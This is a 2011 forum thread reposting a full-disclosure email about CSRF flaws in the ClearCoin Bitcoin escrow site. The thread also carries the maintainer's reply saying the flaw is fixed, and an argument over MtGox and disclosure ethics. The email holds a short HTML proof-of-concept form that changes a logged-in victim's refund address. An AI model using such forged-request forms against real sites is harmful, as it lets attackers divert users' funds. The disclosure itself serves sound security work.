[Full Disclosure] ClearCoin CSRFs

[jrmithdobbs]

Code:

From: Doug Huff <dhuff@jrbobdobbs.org>
Content-Type: multipart/signed; protocol="application/pgp-signature";
	micalg=pgp-sha1; boundary="Apple-Mail-2--499212877"
X-Smtp-Server: smtp.gmail.com:mith@jrbobdobbs.org
Subject: Bitcoin fun day!
Date: Sun, 19 Jun 2011 16:54:28 -0500
X-Universally-Unique-Identifier: 52968483-4027-4d0b-9145-dc72230ee50c
Message-Id: <2B2201C1-E59F-47D4-BF67-08FDB0DDE386@jrbobdobbs.org>
Cc: Bitcoin Dev <bitcoin-development@lists.sourceforge.net>
To: full-disclosure@lists.grok.org.uk
Mime-Version: 1.0 (Apple Message framework v1084)
Content-Transfer-Encoding: 7bit
X-Pgp-Agent: GPGMail 1.3.3

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--Apple-Mail-2--499212877
Content-Type: multipart/signed; boundary=Apple-Mail-1--499212884; protocol="application/pkcs7-signature"; micalg=sha1


--Apple-Mail-1--499212884
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
	charset=us-ascii

In light of recent events in the "bitcoin community" I have decided that =
private disclosure of issues is doing nothing but making them more =
prevalent.

In light of this decision I would like to report multiple CSRF =
vulnerabilities in http://clearcoin.appspot.com .

This set of CSRFs are particularly nasty since this is hosted on appspot =
and uses google account auth. So long as you stay logged into your =
google account you are vulnerable to this CSRF.

Things tested:
  Changing refund address.
  Releasing funds.

POC code (open this in any browser even from a local file):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
<html><head><title>test</title></head>
  <body>
  <form id=3D"refund_address_form" =
action=3D"https://clearcoin.appspot.com/set_refund_address" =
method=3D"POST">=20
      <label for=3D"refund_address">Your bitcoin address:</label>=20
      <input type=3D"text" name=3D"refund_address" id=3D"refund_address" =
size=3D"60" value=3D"PUT ANY ADDRESS HERE"
             class=3D"text ui-widget-content ui-corner-all" autofocus =
required placeholder=3D"refund bitcoin address"/> (required)
  </form>=20
  </body>
</html>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Javascript auto submittal, hiding in an iframe, and other obfuscation =
methods are left as an exercise to the list.

This site is run and maintained by Gavin Anderson, aka, the lead bitcoin =
maintainer.

You should know better Gavin.

--=20
Douglas Huff



--Apple-Mail-1--499212884
Content-Disposition: attachment;
	filename=smime.p7s
Content-Type: application/pkcs7-signature;
	name=smime.p7s
Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIKXDCCBN0w
ggPFoAMCAQICEHGS++YZX6xNEoV0cTSiGKcwDQYJKoZIhvcNAQEFBQAwezELMAkGA1UEBhMCR0Ix
GzAZBgNVBAgMEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBwwHU2FsZm9yZDEaMBgGA1UECgwR
Q29tb2RvIENBIExpbWl0ZWQxITAfBgNVBAMMGEFBQSBDZXJ0aWZpY2F0ZSBTZXJ2aWNlczAeFw0w
NDAxMDEwMDAwMDBaFw0yODEyMzEyMzU5NTlaMIGuMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQx
FzAVBgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsx
ITAfBgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJz
dC1DbGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
MIIBCgKCAQEAsjmFpPJ9q0E7YkY3rs3BYHW8OWX5ShpHornMSMxqmNVNNRm5pELlzkniii8efNIx
B8dOtINknS4p1aJkxIW9hVE1eaROaJB7HHqkkqgX8pgV8pPMyaQylbsMTzC9mKALi+VuG6JG+ni8
om+rWV6lL8/K2m2qL+usobNqqrcuZzWLeeEeaYji5kbNoKXqvgvOdjp6Dpvq/NonWz1zHyLmSGHG
TPNpsaguG7bUMSAsvIKKjqQOpdeJQ/wWWq8dcdcRWdq6hw2v+vPhwvCkxWeM1tZUOt4KpLoDd7Nl
yP0e03RiqhjKaJMeoYV+9Udly/hNVyh00jT/MLbu9mIwFIws6wIDAQABo4IBJzCCASMwHwYDVR0j
BBgwFoAUoBEKIz6W8Qfs4q8p74Klf9AwpLQwHQYDVR0OBBYEFImCZ33EnSZwAEu0UEh83j2uBG59
MA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdJQQWMBQGCCsGAQUFBwMCBggr
BgEFBQcDBDARBgNVHSAECjAIMAYGBFUdIAAwewYDVR0fBHQwcjA4oDagNIYyaHR0cDovL2NybC5j
b21vZG9jYS5jb20vQUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmwwNqA0oDKGMGh0dHA6Ly9jcmwu
Y29tb2RvLm5ldC9BQUFDZXJ0aWZpY2F0ZVNlcnZpY2VzLmNybDARBglghkgBhvhCAQEEBAMCAQYw
DQYJKoZIhvcNAQEFBQADggEBAJ2Vyzy4fqUJxB6/C8LHdo45PJTGEKpPDMngq4RdiVTgZTvzbRx8
NywlVF+WIfw3hJGdFdwUT4HPVB1rbEVgxy35l1FM+WbKPKCCjKbI8OLp1Er57D9Wyd12jMOCAU9s
APMeGmF0BEcDqcZAV5G8ZSLFJ2dPV9tkWtmNH7qGL/QGrpxp7en0zykX2OBKnxogL5dMUbtGB8SK
N04g4wkxaMeexIud6H4RvDJoEJYRmETYKlFgTYjrdDrfQwYyyDlWjDoRUtNBpEMD9O3vMyfbOeAU
TibJ2PU54om4k123KSZB6rObroP8d3XK6Mq1/uJlSmM+RMTQw16Hc6mYHK9/FX8wggV3MIIEX6AD
AgECAhEA3puo39RJhNVx/ssfdXafbjANBgkqhkiG9w0BAQUFADCBrjELMAkGA1UEBhMCVVMxCzAJ
BgNVBAgTAlVUMRcwFQYDVQQHEw5TYWx0IExha2UgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJUUlVT
VCBOZXR3b3JrMSEwHwYDVQQLExhodHRwOi8vd3d3LnVzZXJ0cnVzdC5jb20xNjA0BgNVBAMTLVVU
Ti1VU0VSRmlyc3QtQ2xpZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBFbWFpbDAeFw0xMTA1MDEwMDAw
MDBaFw0xMjA0MzAyMzU5NTlaMCUxIzAhBgkqhkiG9w0BCQEWFGRodWZmQGpyYm9iZG9iYnMub3Jn
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3ZPhVmPPoaj999EiZAp6e/giHUrh0Pq2
/LjCFtVgP7clqtoStYyz7i9LojgmRqKu6cswpltUICp+rRskK6ISYRYkNf9w587D2xtqHVVjmoH8
afW/B0db4v+wC7wjzh+hFlXZ3q7sZApMqsFgAS3mdF+iEe5nNt9kGD7OhNlVimvNqcpIhJhRBhpW
7vi7/Rt8uVciDOYVARJq7Tb1zZe88wTFkVri075/nFYfikCgU3GccxvcnR9QwC7xoyGFtE/z8qjv
1h1Tn+eS7eEYQveQxMFNnEPHfoihpiSQpQUzEAJK96dwj8ED2CXtNpV6pQ9PCu2HWjXIVpZj+YNN
eOSRbwIDAQABo4ICFjCCAhIwHwYDVR0jBBgwFoAUiYJnfcSdJnAAS7RQSHzePa4Ebn0wHQYDVR0O
BBYEFGBmA3ruGdgBmCodBzi9QrRBvjz/MA4GA1UdDwEB/wQEAwIFoDAMBgNVHRMBAf8EAjAAMCAG
A1UdJQQZMBcGCCsGAQUFBwMEBgsrBgEEAbIxAQMFAjARBglghkgBhvhCAQEEBAMCBSAwRgYDVR0g
BD8wPTA7BgwrBgEEAbIxAQIBAQEwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1cmUuY29tb2Rv
Lm5ldC9DUFMwgaUGA1UdHwSBnTCBmjBMoEqgSIZGaHR0cDovL2NybC5jb21vZG9jYS5jb20vVVRO
LVVTRVJGaXJzdC1DbGllbnRBdXRoZW50aWNhdGlvbmFuZEVtYWlsLmNybDBKoEigRoZEaHR0cDov
L2NybC5jb21vZG8ubmV0L1VUTi1VU0VSRmlyc3QtQ2xpZW50QXV0aGVudGljYXRpb25hbmRFbWFp
bC5jcmwwbAYIKwYBBQUHAQEEYDBeMDYGCCsGAQUFBzAChipodHRwOi8vY3J0LmNvbW9kb2NhLmNv
bS9VVE5BQUFDbGllbnRDQS5jcnQwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmNvbW9kb2NhLmNv
bTAfBgNVHREEGDAWgRRkaHVmZkBqcmJvYmRvYmJzLm9yZzANBgkqhkiG9w0BAQUFAAOCAQEAj/Ck
hfsc3p7aoCSIMGOTVBzBjJBtCwWTUF1d/pnJ7ynWCiEOypIGGe0im5+Y1WH8+fVNgIwlifRSoZ1R
oloxXRuqiraKCevG5OC41Evkp67HmrrhlerLxUvoKLg7sDWfYtmQ24whfYEsd3Fm2u6KxoXboyyb
fdDhl5BLhWy+5kHHlIaoZjUoHHXOMuOZdhreIcJI54+wehddzwtdrhF0h2KUTm3tvA0e2kTX4Kzz
3JWIzFSsCmTdTx2UdiOBJmWZ8dgdskOSKRYByvSBT+/BsbF+JbJcjCHqDiEmmXQeTNuRDYeCPfkq
/HRSrEZMi/RORls1HSA79IOXjvj8RkAKyDGCA/8wggP7AgEBMIHEMIGuMQswCQYDVQQGEwJVUzEL
MAkGA1UECBMCVVQxFzAVBgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRS
VVNUIE5ldHdvcmsxITAfBgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMt
VVROLVVTRVJGaXJzdC1DbGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsAhEA3puo39RJhNVx
/ssfdXafbjAJBgUrDgMCGgUAoIICDzAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
DQEJBTEPFw0xMTA2MTkyMTU0MjlaMCMGCSqGSIb3DQEJBDEWBBRTgeJlgs0yICFYnbqMVlsvFVdx
jTCB1QYJKwYBBAGCNxAEMYHHMIHEMIGuMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQxFzAVBgNV
BAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxITAfBgNV
BAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJzdC1DbGll
bnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsAhEA3puo39RJhNVx/ssfdXafbjCB1wYLKoZIhvcN
AQkQAgsxgceggcQwga4xCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJVVDEXMBUGA1UEBxMOU2FsdCBM
YWtlIENpdHkxHjAcBgNVBAoTFVRoZSBVU0VSVFJVU1QgTmV0d29yazEhMB8GA1UECxMYaHR0cDov
L3d3dy51c2VydHJ1c3QuY29tMTYwNAYDVQQDEy1VVE4tVVNFUkZpcnN0LUNsaWVudCBBdXRoZW50
aWNhdGlvbiBhbmQgRW1haWwCEQDem6jf1EmE1XH+yx91dp9uMA0GCSqGSIb3DQEBAQUABIIBAIa0
nEwugdoy0co/xZSmSF2FL3Q2I1QjrcwOP2svW7D6yUXl2e9xZdvxPehdGg51UJGtGDDzc5vnT5DW
HWpskxWyBbwYHEM4g+Tuix0pCey7twTJ51tv4uCZljUzfNc1IrctezhdNmFJQfKIrN+Yq6b81Qnt
zmK0pq+va+WVMBez9CnojZaijViQD8agyCWouZhQRPwFE7iTaARwtcuoHpN34TqvNfGpeSOAwi13
6LpFDlN9zzyVeRLgwqbiRQnd2KCzv7yWI+OlzK4bgVB5TPclErhTUvb+rAtAlZM7cDf5uFzsMk1d
/ui76BOfwXTFRAZsmyKQRjz6NeTNKuOuNtkAAAAAAAA=

--Apple-Mail-1--499212884--

--Apple-Mail-2--499212877
content-type: application/pgp-signature; x-mac-type=70674453;
	name=PGP.sig
content-description: This is a digitally signed message part
content-disposition: inline; filename=PGP.sig
content-transfer-encoding: 7bit

-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org

iQIcBAEBAgAGBQJN/nAVAAoJEEPHkQabDWHPBRUP/RqNgPYEjbzKLNOktnBr1Ec0
VC1k+z6dFoX8FiH4lciF+CFBPHuQ6fsbR9tbVLFVSWmym1F33KVy/7dzsIWbCfGf
Q255aHrFQsVFPejxmgzRRLhZ8D19vxp3l69ALMe3QKhVdfdfjykVZwnoeeUx7GnJ
kcrcM9VWISp+Lr9Yc/HgsnerDPomAYEmiH4ur/CS6vC2PKayVoAbwh4Cr+5UyBUP
/AdYXCRhF1Mci0K3mg3boG8FQkGn+zJJ7s3TB2FMZvK43lSzS1+f2GTfbBZRPVbq
1hyijFZJx/4P4fX6kOICudU/5/8i9X0qgRoqenXf7kJVH4+e29JCXJNOMXMMrMZN
au3H6mq6KvmZKMnxZIs4e8G1NIWzO6oOQD7BhUE8A11IlaiNiUYvT+Z1PrV3lfwP
PgSUnQo3FmH4dPT+fNydQusN/sLMKdrCzRLUAj6o0ZlAu2nvzHU+spDmDluzwdNo
QW7BNdgcpEUVozgFx/gxi0eXUjOfxS120uyCwLbEFWbUqwmmpxMlACpliOU439P3
p4uXpISVIOLmRY2pL2mFx9PEzAc5z4Q4+g+HTZtp9cy5fJ7htZSKItuSbciLNlcS
htX8F/g+Ap0W9Lnd+nnVXxZ8YxOufBvfptU9TSIaVq7uhIphluFiF+nMwqjg4PWE
BNbnmnNAmUKC7+bLjSzx
=e0ef
-----END PGP SIGNATURE-----

http://sourceforge.net/mailarchive/forum.php?thread_name=2B2201C1-E59F-47D4-BF67-08FDB0DDE386%40jrbobdobbs.org&forum_name=bitcoin-development

Sorry Gavin.

(Gavin has already pulled clearcoin offline to address the issue.)

Edit: Adding f-d link for posterity.
http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081574.html

[Durr]

Who trusts Gavin anyway?

[Gavin Andresen]

Yes, don't trust me, please.  I am human and will make mistakes.

The CSRF vulnerability on ClearCoin is fixed. I will be contacting any ClearCoin customers who have changed their refund addresses to make sure that they were not the victim of a CSRF attack.

[Andrew Vorobyov]

You can make thousands of mistakes in web programming, but please!!! - don't fuck up with C++

[jrmithdobbs]

Yes, don't trust me, please.  I am human and will make mistakes.

The CSRF vulnerability on ClearCoin is fixed. I will be contacting any ClearCoin customers who have changed their refund addresses to make sure that they were not the victim of a CSRF attack.

Thank you for your timely response and correction of the issue.

[done]

Great job guys

[gigitrix]

You can make thousands of mistakes in web programming, but please!!! - don't fuck up with C++

Hahah, never has a truer word been spoken!

[Batouzo]

Who trusts Gavin anyway?

Well... the FBI?  (conference)

[unk]

this may sound petulant, and my apologies if it is, but i distinctly recall the user "s" pointing out in this forum the importance of cross-site request forgeries and the fact that many popular bitcoin-related websites were vulnerable to them. he (or she) then left the forum and deleted all his/her posts, having been pushed away by extreme libertarians.

this is another example of the tone of the forums posing a problem for the bitcoin community, which could benefit from more inclusiveness, diversity of opinion, and politeness. if people had listened to "s" rather than dismissing that user's concerns as somehow hostile to bitcoin because they didn't 'toe the line', many problems could have been addressed months ago.

[NghtRppr]

this may sound petulant, and my apologies if it is, but i distinctly recall the user "s" pointing out in this forum the importance of cross-site request forgeries and the fact that many popular bitcoin-related websites were vulnerable to them. he (or she) then left the forum and deleted all his/her posts, having been pushed away by extreme libertarians.

this is another example of the tone of the forums posing a problem for the bitcoin community, which could benefit from a more inclusiveness, diversity of opinion, and politeness. if people had listened to "s" rather than dismissing that user's concerns as somehow hostile to bitcoin because they didn't 'toe the line', many problems could have been addressed months ago.

I take offense to lumping all of us libertarians together as if we are the problem. Please look over my post history and you will see that I simply don't engage in personal attacks or abusive behavior in general, even when viciously insulted. The people that are decrying anything that could devalue BTC are the people that are just into Bitcoin to make a few quick bucks. I'm in it for the long haul because I value economic freedom as a libertarian. I'd rather see the currency stabilize than make money. I have a source of income. I don't need to speculate. I also welcome disclosure of vulnerabilities because it puts pressure on administrators to fix the problem as well as notifies the community that they should think twice about trusting the keys to the kingdom without considering risk. Please rethink your opinion on libertarians because even when the speculators are long gone, we will still be here wanting to use this currency.

[iCEBREAKER]

this may sound petulant, and my apologies if it is, but i distinctly recall the user "s" pointing out in this forum the importance of cross-site request forgeries and the fact that many popular bitcoin-related websites were vulnerable to them. he (or she) then left the forum and deleted all his/her posts, having been pushed away by extreme libertarians.

this is another example of the tone of the forums posing a problem for the bitcoin community, which could benefit from more inclusiveness, diversity of opinion, and politeness. if people had listened to "s" rather than dismissing that user's concerns as somehow hostile to bitcoin because they didn't 'toe the line', many problems could have been addressed months ago.

I, too, Blame Ayn Rand for all evil in the world and especially on this forum.

/s

That's actually more lulzy than petulant. 

I think we've all learned some valuable lessons today, about boring web standards' XCHMLL bugs that cause HTXL->BTC overflows or whatever. 

And not using the same l/p.  And due diligence.

[TriumVir]

Amateur hour all the way around.

[unk]

I, too, Blame Ayn Rand for all evil in the world and especially on this forum.

'for some ridiculous and extreme attitudes among teenagers' is not the same thing as 'all the evil in the world'. but bitcoin2cash is right. i really just have a particular type of poster in mind. it's not everyone who happens to be a libertarian; it's the rabid, often teenage ones who think that any criticism of the bitcoin protocol must be motivated by a brainwashing from the 'state'.

I think we've all learned some valuable lessons today, about boring web standards' XCHMLL bugs that cause HTXL->BTC overflows or whatever. 

these were not lessons to learn; these are obvious to anyone with even the slightest experience in systems security. as i said, a good critical user who visited the forum for a week pointed them out, specifically, along with a variety of other problems. either there's too much noise or too much complacency for people to listen or learn before the problems manifest themselves.

[iCEBREAKER]

i really just have a particular type of poster in mind. it's not everyone who happens to be a libertarian; it's the rabid, often teenage ones who think that any criticism of the bitcoin protocol must be motivated by a brainwashing from the 'state'.

Many teens have yet not learned to tolerate the ignorant hypocrisy of those whose knee jerk objections to bitcoin not only are specifically addressed by the design, but obviously apply to the fiat money created by the State.  That's a good thing.  I like people who stand up and vigorously defend their values and beliefs.

If you, or the other guy who left, can't look past their enthusiasm, vehemence, and zeal that's your problem.

Even a reasonable adult might get sick having to repeatedly point out that federal reserve notes are way more of a fake Ponzi rip-off scam than any form of cryptocash.

these were not lessons to learn; these are obvious to anyone with even the slightest experience in systems security. as i said, a good critical user who visited the forum for a week pointed them out, specifically, along with a variety of other problems. either there's too much noise or too much complacency for people to listen or learn before the problems manifest themselves.

Nice try, gotcha guy.  But it turns out that the supposed MtGox "hack" was an inside job.  It had NOTHING to do with XSRF, SQL, or whatever technical point the oversensitive guy (who ran away rather than debate mean, stinky libertarians) was previously belaboring.

[unk]

Nice try, gotcha guy.  But it turns out that the supposed MtGox "hack" was an inside job.  It had NOTHING to do with XSRF, SQL, or whatever technical point the oversensitive guy (who ran away rather than debate mean, stinky libertarians) was previously belaboring.

mt. gox was, within the last week and by their own admission, vulnerable to cross-site request forgeries. i don't recall "s" ever saying anything about sql injection, which is harder to detect without access to the code. (it's not worth debating this if you're not a technical person yourself.)

[iCEBREAKER]

Nice try, gotcha guy.  But it turns out that the supposed MtGox "hack" was an inside job.  It had NOTHING to do with XSRF, SQL, or whatever technical point the oversensitive guy (who ran away rather than debate mean, stinky libertarians) was previously belaboring.

mt. gox was, within the last week and by their own admission, vulnerable to cross-site request forgeries. i don't recall "s" ever saying anything about sql injection, which is harder to detect without access to the code. (it's not worth debating this if you're not a technical person yourself.)

Nobody is debating whether the XSRF vulnerability existed any longer, as it was demonstrated on Friday night.

It's been fixed and had nothing to do with the break-in, which was the fault of MtGox's finance auditor AND NOT THE RESULT OF XSRF, SQL, TROJANS, TEMPEST, OR WHATEVER YOUR BUDDY WAS MOANING ABOUT.

Now the issue is that so many were so quick to point fingers immediately following the MtGox breach, without bothering to confirm or verify anything with the principals involved.

You aren't the only "OMG we tried to warn them but they DINT LISEN" bozo who was proven wrong by tonight's interview.  There are/were a lot of expert opinions, ie, wild guesses being thrown around.

Spare us the "it's not worth debating this if you're not a technical person yourself" snobbery.  You may rest assured that I understand the difference between a XSRF and SQL injection.  I get paid to make damn sure such things keep running smoothly. 

I'm sure your e-peen is so massive it would stampede the women and scare the children, so please keep it private and to yourself.

[unk]

You aren't the only "OMG we tried to warn them but they DINT LISEN" bozo who was proven wrong by tonight's interview.  There are/were a lot of expert opinions, ie, wild guesses being thrown around.

i'm not clear what you think i said that has been 'proven wrong', but i believe you're mistaken.

Spare us the "it's not worth debating this if you're not a technical person yourself" snobbery.  You may rest assured that I understand the difference between a XSRF and SQL injection.  I get paid to make damn sure such things keep running smoothly. 

I'm sure your e-peen is so massive it would stampede the women and scare the children, so please keep it private and to yourself.

this again is just the sort of childish response that i'm critiquing. you referred to 'XCHMLL bugs that cause HTXL->BTC overflows or whatever'; a reasonable inference from that kind of a comment is that you have little technical understanding of the concepts we're discussing. if that is not true, you can't fault me for picking up on an anti-intellectual mannerism you intentionally put forward.

[iCEBREAKER]

You aren't the only "OMG we tried to warn them but they DINT LISEN" bozo who was proven wrong by tonight's interview.  There are/were a lot of expert opinions, ie, wild guesses being thrown around.

i'm not clear what you think i said that has been 'proven wrong', but i believe you're mistaken.

Spare us the "it's not worth debating this if you're not a technical person yourself" snobbery.  You may rest assured that I understand the difference between a XSRF and SQL injection.  I get paid to make damn sure such things keep running smoothly. 

I'm sure your e-peen is so massive it would stampede the women and scare the children, so please keep it private and to yourself.

this again is just the sort of childish response that i'm critiquing. you referred to 'XCHMLL bugs that cause HTXL->BTC overflows or whatever'; a reasonable inference from that kind of a comment is that you have little technical understanding of the concepts we're discussing. if that is not true, you can't fault me for picking up on an anti-intellectual mannerism you intentionally put forward.

It's not that hard: the interview tonight (did you watch it?) about the break-in proved that ALL the people who were claiming they knew the cause of the MtGox heist were WRONG.

Your petulant lack of humor is far more childish than my poking fun at the idea of technobabble as a compelling explanation for the MtGox situation.

Your humorless, grumpy inference regarding my technical understanding of the concepts at hand was not reasonable, especially given my previous posts and demonstrated hash rate.

[unk]

It's not that hard: the interview tonight (did you watch it?) about the break-in proved that ALL the people who were claiming they knew the cause of the MtGox heist were WRONG.

and where do you think i ever claimed that i knew the cause of the problems on mt. gox? i wasn't even talking about them. note that we're in a discussion about a cross-site forgery problem on clearcoin. i brought up mt. gox only after you called me 'gotcha guy' and seemed to suggest they had never been vulnerable to such request-forgery problems.

i know this is an internet forum and all, and reading comprehension may not be your strength, but it might be worth actually reading what i'm saying before criticising it, calling me a 'bozo', and referring to my 'e-peen'. grow up, please.

[jrmithdobbs]

It's not that hard: the interview tonight (did you watch it?) about the break-in proved that ALL the people who were claiming they knew the cause of the MtGox heist were WRONG.

That interview proved nothing except that the rep of mtgox present said some things with no evidence presented except for their willingness to make public statements without seeking legal counsel first and that they do not understand basic technical concepts.

Considering their recent track record of responding to (more like: not responding to) privately disclosed security issues. (It took *a week* for tux to respond to someone trying to report those csrfs. He only responded once it was made public. It was not confirmed friday. It was confirmed much earlier in the week.) The SQL injection issues that were fixed in the last few days on mtgox with no announcement or disclosure. Etc.

Tux's behaviour is what prompted me to disclose this the way I did. I think going forward that all bitcoin-related security issues should get the full disclosure treatment to discourage another mtgox.

(Really am sorry Gavin. I know you would have responded appropriately had this been privately disclosed.)